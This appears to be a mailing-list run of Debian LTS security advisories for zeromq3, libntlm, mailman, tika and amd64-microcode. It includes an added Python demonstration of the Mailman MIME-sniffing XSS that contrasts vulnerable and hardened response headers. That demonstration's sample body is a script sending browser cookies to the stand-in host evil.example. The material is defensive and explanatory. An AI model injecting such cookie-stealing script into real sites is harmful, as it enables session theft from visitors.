-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2588-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
March 09, 2021                                https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : zeromq3
Version        : 4.2.1-4+deb9u4
CVE ID         : CVE-2021-20234 CVE-2021-20235

Two security issues have been detected in zeromq3.

CVE-2021-20234

    Memory leak in client induced by malicious server(s) without
    CURVE/ZAP. From issue description [1]: When a pipe processes a
    delimiter and is already not in active state but still has an
    unfinished message, the message is leaked.

CVE-2021-20235

    Heap overflow when receiving malformed ZMTP v1 packets. From issue
    description [2]: The static allocator was implemented to shrink its
    recorded size similarly to the shared allocator. But it does not need
    to, and it should not, because unlike the shared one the static
    allocator always uses a static buffer, with a size defined by the
    ZMQ_IN_BATCH_SIZE socket option (default 8192), so changing the size
    opens the library to heap overflows. The static allocator is used only
    with ZMTP v1 peers.

[1] https://github.com/zeromq/libzmq/security/advisories/GHSA-wfr2-29gj-5w87
[2] https://github.com/zeromq/libzmq/security/advisories/GHSA-fc3w-qxf5-7hp6

For Debian 9 stretch, these problems have been fixed in version
4.2.1-4+deb9u4.

We recommend that you upgrade your zeromq3 packages.

For the detailed security status of zeromq3 please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/zeromq3

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBI7kcACgkQ0+Fzg8+n
/wZ8pw//b+XR7+mftqtDtMoLD/uRDR4S90OXtVeNJeuigpBuoeHYX1x+ukBZxTki
O9/QFjtan1MsONltjpq0FB5WHC6wjjP7FJVRRa4LT85CAFHe0X+5UxohorLBRaRY
XiQlbB+0H22/QM92JHUzP7imSkXaoMubnQ8P8EMkQqiEK3xMhZxcePDq6ueMf9b7
WiaPmEaZVXFcAAl1gcF094Ce53okPgRla5uifFkKRreSOk0bTzYIzZOWLRRHABt/
9RvzKKuCsyn9qjXkjM1sXYU8NReEn2CBQI7nr4sHDeYJdG64f32HYnffUWZtpJSC
cuHxuDCGJ1Z1pWPnUDiL2G8vJMfqmvkhqDvF4LZjUMx7cviuCDu8gxG5Kgh8L78Y
svi6Y8xlvpnLfrKjm+3AyA5LpnNmeVt9PgBzYaa1dFRqn5SK1WUdgi3pdjR2jUs5
wXdjIZxfj2YihVnGgsF5Mc8fiOK/oSPEfnCtQUCaVqUPKkrm2ywL3hEY1c53E40n
gm4Uveo8j51dIEAMa6z06DWb7r5Rq1JwToqkRXv6lPmI0Y78VCTBD2E1M+1MkinQ
jcDeMGT3j1EYidQ4Ggn42rRrRdokjWgZKeoMj7CCNoM1dM0AYfcS+XJlio2Pdcnu
LmswK0vMGv71FtzTgmIjRxsv9ZVzNAA1CDHKzkWRqEVs6GjLOQY=
=zHQ+
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2207-1] libntlm security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Package        : libntlm
Version        : 1.4-3+deb8u1
CVE ID         : CVE-2019-17455

It was discovered that libntlm through 1.5 relies on a fixed buffer size
for tSmbNtlmAuthRequest, tSmbNtlmAuthChallenge, and tSmbNtlmAuthResponse
read and write operations, as demonstrated by a stack-based buffer
over-read in buildSmbNtlmAuthRequest in smbutil.c for a crafted NTLM
request.

For Debian 8 "Jessie", this problem has been fixed in version
1.4-3+deb8u1.

We recommend that you upgrade your libntlm packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl64K/kACgkQ0+Fzg8+n
/wbYhw/+IYUw88cFkAa1sK8EdXbLQvbmE/2dOD3ZaaJsrxtB2L3aTORyjcpe3FEI
wgQ+mM7Tn4o3IAVVcKq3xjYyBG/k+wKRTfGnWQJI9aJivDZYpYbR06fFya95HC7+
FpBFwAwEA1AVHOif3jAjDSMKKrxRhML58zj7cIZLYybgfcooTk3jrn+e1Y+0XxnX
Y+uslnvvAunRh6n67+Gbq8Nf3oqXV22039XpvUQbzApSkgWJojRvx1IlNUFT5JOL
a8jdbtTc0l6DegIWmpvkrB1wFHq93g9zZBvbRUBP8VyMnsZCR6LV7GZMI04N/Cl0
CeJmVenE9i5bTBaVcNMvuXGWtjzm7mTgFiILck1qk7zxSZnJJnZeHE3qb/+iaCZn
SxQpu+EXudw2V1SaqvPr8FUPA6DWRV8nnmlneYLq/5DJJJEBUMU4GTiTIrdUpyjE
rzOvQ3rivd/ILvAsKmVQU5Tu8fpqMNR4tKpv/mu8ybU2oF7z8jmtv4p/B3ywYOXr
owGt8CEJ4b6FwGJiMWiccd0fkGx1rtSXqUSA802ctIEnjyG88Cvhtvb7J9c5GrvU
I3H3PaMYBiANnxPOZ1XSCNpMh1flqBLX60O70rX4/RkfhoNTMiXmWLB2t8lxMofw
NJGcSfKTdlePFANF9DUK9y8ifby39XaoxqbIp8dequY28mMpPwc=
=40TN
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2200-1] mailman security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Package        : mailman
Version        : 1:2.1.18-2+deb8u5
CVE ID         : CVE-2020-12137

A vulnerability was discovered in mailman. GNU Mailman 2.x before 2.1.30
uses the .obj extension for scrubbed application/octet-stream MIME parts.
This behavior may contribute to XSS attacks against list-archive visitors,
because an HTTP reply from an archive web server may lack a MIME type, and
a web browser may perform MIME sniffing, conclude that the MIME type
should have been text/html, and execute JavaScript code.

For Debian 8 "Jessie", this problem has been fixed in version
1:2.1.18-2+deb8u5.

We recommend that you upgrade your mailman packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl6uobwACgkQ0+Fzg8+n
/wbMJQ//eUbb2EAZBBKxb4pvXbNm4BrGCl1FDGC2YC/j2U8F50zlYKF4f5sJoEb5
JWWwV80/rqNd3RyUS9kU8ddl0y0nArt6uH9QrhUFgTtx3woT2lPj128cj18+dxfk
rSjsc++FxrU/eoUG4DDTghdPJcmT8Mqp4GoaMlaS2OZzimWFYJv6hgiDY80a5ywX
75SzakbpOX1LJgC+0J8S90d+qzmHKirrVC7udn6OivXB288IZjKvchZcE6aZTaED
XTYzQYKyHXfiCZnAZPh2Us0w2Dzpkik1E6ysRSc0vBDBZ6NFh7wc0AvXOyHdSzKX
FAj2pXAMABpuloBB2cqryl+9vTVOW5AFDs41SDAytG1CetOQjmka/lQyx8Cc0lYZ
KBm95t2kahBrpq4+zZJPyR2k5zkW3YFKH7m6idFMLsGPpInB+++5sF0aL84vyCgE
uJNatg0qIf90XiNFDM01+E07AjhpJyxNTVEWnXZ60bUCyMZpMwqRl7X4o7EdQPCm
b8onRF+JlHMK6Js27hb0PQo8ofBtN6QvVcbgR1vD68x9ZpSOgdJqzAOJenKWu407
DSumuJRnDeDcisGR+P/M2FoKMuDDcBlRjpv5ob/o8AxnHG7klo4H0KCLLJvMX9iX
cr0C1xc/ke/BlZ4bkga+vEZqaRFeZSQ+o5FrFuhapagAQRU5zbg=
=TeBZ
-----END PGP SIGNATURE-----
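The MIME-sniffing path behind CVE-2020-12137 above, as an added example that is neither Mailman's code nor any browser's. `hardened_headers()` shows the response headers an archive server should send for a scrubbed part, and `browser_effective_type()` is a deliberately simplified model of content sniffing: a missing Content-Type, or a `text/plain` one without `X-Content-Type-Options: nosniff`, is guessed from the leading bytes. This is not the full WHATWG algorithm. The attachment name, body and extension table are constructed for the demonstration.

```python
import os

# Allowlisted extension -> Content-Type for archived attachments. Everything
# else, including scrubbed application/octet-stream parts, is served opaque.
SAFE_TYPES = {
    ".txt": "text/plain; charset=utf-8",
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".pdf": "application/pdf",
}

# Leading byte patterns a sniffing browser takes to mean "this is HTML".
HTML_MARKERS = (b"<!doctype html", b"<html", b"<head", b"<script",
                b"<iframe", b"<body")

# Declared types (or the absence of one) that the model allows to be sniffed
# when nosniff is not set; text/plain is included for older browsers.
SNIFFABLE = {None, "text/plain"}


def legacy_headers(filename):
    """Pre-fix situation from the advisory: the archive web server has no
    type registered for the .obj name, so the reply carries no Content-Type."""
    return {}


def hardened_headers(filename):
    """Always declare a type, forbid sniffing, and force a download."""
    ext = os.path.splitext(filename)[1].lower()
    safe_name = os.path.basename(filename).replace('"', "").replace("\\", "")
    return {
        "Content-Type": SAFE_TYPES.get(ext, "application/octet-stream"),
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
    }


def browser_effective_type(headers, body):
    """Simplified sniffing model: with nosniff the declared type is final;
    a declared type outside SNIFFABLE is honoured; otherwise guess from
    the first bytes of the body."""
    declared = headers.get("Content-Type")
    base = declared.split(";")[0].strip().lower() if declared else None
    nosniff = headers.get("X-Content-Type-Options", "").strip().lower() == "nosniff"
    if base is not None and (nosniff or base not in SNIFFABLE):
        return base
    head = body[:512].lstrip().lower()
    if any(head.startswith(marker) for marker in HTML_MARKERS):
        return "text/html"
    return base or "application/octet-stream"


def will_execute_script(headers, body):
    """True if the browser would render the part as a document in the
    archive's origin, which is where its inline script would run."""
    disposition = headers.get("Content-Disposition", "inline")
    if disposition.strip().lower().startswith("attachment"):
        return False
    return browser_effective_type(headers, body) == "text/html"


# Constructed scrubbed part: HTML that was attached as application/octet-stream.
SCRUBBED_PART_NAME = "attachment-0001.obj"
SCRUBBED_PART_BODY = (b"<html><script>new Image().src='//evil.example/?c='"
                      b"+document.cookie</script></html>")

if __name__ == "__main__":
    for label, headers in (("legacy", legacy_headers(SCRUBBED_PART_NAME)),
                           ("hardened", hardened_headers(SCRUBBED_PART_NAME))):
        print(label, browser_effective_type(headers, SCRUBBED_PART_BODY),
              "executes script:", will_execute_script(headers, SCRUBBED_PART_BODY))
```

The two headers do different jobs: `nosniff` stops the browser from reinterpreting what the server declared, and `Content-Disposition: attachment` keeps the part from being rendered in the archive's origin even if a declared type were wrong. Unknown extensions never get a guessed type; they fall back to `application/octet-stream` and a download.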
[SECURITY] [DLA 2161-1] tika security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Package        : tika
Version        : 1.5-1+deb8u1
CVE ID         : CVE-2020-1950 CVE-2020-1951
Debian Bug     : 954302 954303

Two security issues have been detected in tika and fixed.

CVE-2020-1950

    A carefully crafted or corrupt PSD file can cause excessive memory
    usage in Apache Tika's PSDParser.

CVE-2020-1951

    Infinite loop (DoS) vulnerability in Apache Tika's PSDParser.

For Debian 8 "Jessie", these problems have been fixed in version
1.5-1+deb8u1.

We recommend that you upgrade your tika packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl5/vcgACgkQ0+Fzg8+n
/wblJQ//XmHdn2NoWi61t0m0mu2x9zi0kvkSiHbD3yUpo/pqFI5KLOQz61W2Q2OQ
h50cAC9bWai+Vzz0LytjR9uL3z/yE0YETQlYDeHXpigTsso2OixnxcJwMIQSDSZC
AgWITLEwL4pO8InZnmrAVhrGOcfqiOn1BNzh3yHzcZ/1ytKSL43UB/J/FQlOQDCR
kQ5JHTUSdCaR9yG8pvFKpiJmauaKTDbPaEIHJ4T+Vhe3twubT1fKbWASbcgvCO5Q
T41R8Qmvy8fou5IHoB2LLwqsPwrhpSBqES2tt4XLEuGlsOH2ZMn9JfkZL5yT2PQ4
818WIwTa56Mwagb96hwq1F0Q2PTWCHnF7mnZk6xz2Cq1OeoLjOBOa33xFGleYio6
Uo+W4nuXbRvTuIMxmTZKlgKWoOBefMd7PbtQtQzX8X0H9BMypGbelhw3OAhTNKtl
pNTPHp8FflmKVw4JY1ef2g+9cf+xagv/aWmOQiKbtzLuroAFdp9BdGYw4/jOyGIr
/J2WxnkHbbROiRyslMS36J9e01ewXJSdJyvA9mVITfPbYkRtSlylZIwafd0Ven/O
1Ax6dClbL8Mk++7M9cjJ3TbJlp5934W5Ximx6RXLEI9p1omWGotVBW3kVIjJtg3Q
ybKbimsCtxCCXJ9WwQTHgzGzJrJpGTGWT/ki7Ey2jgKKVJe4aWs=
=mAhY
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2148-1] amd64-microcode security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Package        : amd64-microcode
Version        : 3.20181128.1~deb8u1
CVE ID         : CVE-2017-5715
Debian Bug     : 886382

It was discovered that systems with microprocessors utilizing speculative
execution and indirect branch prediction may allow unauthorized
disclosure of information to an attacker with local user access via a
side-channel analysis (Spectre v2). Multiple fixes were done already in
the Linux kernel, intel-microcode etc. This fix adds amd-microcode-based
IBPB support.

For Debian 8 "Jessie", this problem has been fixed in version
3.20181128.1~deb8u1.

We recommend that you upgrade your amd64-microcode package.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequent

Regards,

Anton
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl51H84ACgkQ0+Fzg8+n
/wZvjw//dgFzx6McqaXwd9ydzqxrvxIXxiNU3yYQKEZ6NxTjMHSrrPBCCKWfy36d
lvjzK40Krmn1Q7YSae122YWi/4Sk5S5Y3QTgGD+QHrhQ1AYoyCmbRL3t+drntvVU
lCKv/3VKlLA+E9UX3w5ZKRxOHSoiIbliJ+k8q2PbgruttOX3RJLEtzv3bjUCBsmf
uO5WS/fZt5ia8Qrsk8xZ4uBnF3GgmfUDVaR8Pl9oBIcesBZUqZb0mL73NoGsdIyJ
vKN9h14c+3JujOgMu+GFJ8nNUl8KvLHU3RjXpIK0Ov/PiTykiZed+h2KkA07scJe
gmrbOQsZa53/PJUS4/PT+Nk7UaQh9UPxb3Ipw7QfiOcHY5h17zSwipVmo3nyeftC
N/3khJLQhmiwTl4ejGVcR6PEdF+Gh0Ry9K196BqXwjnsoly+HYKmEARNsVygxQlR
GnN2MG+tTCZMjo6tDv8sV5Lsmmjj6/5UEATZaDxLalRRlbNpXRAAd15sxWQCCFPC
FIx1xaEvlqvkqNvjtudcwDvVv/8c/vYvilzmdTz63WQrP00VPo3SVdpASuIMbBDP
D38D4WtYrwUgKWPI1Vb8aiJAPNhPUzLiSzT1/rC3AZ+BmX3IiFtLXLly+33p5voo
acpXt/Fh0ufCnjhsxLaTgkkdksTucmMf0JwE+bzDmWgZFq5hjLM=
=HLKx
-----END PGP SIGNATURE-----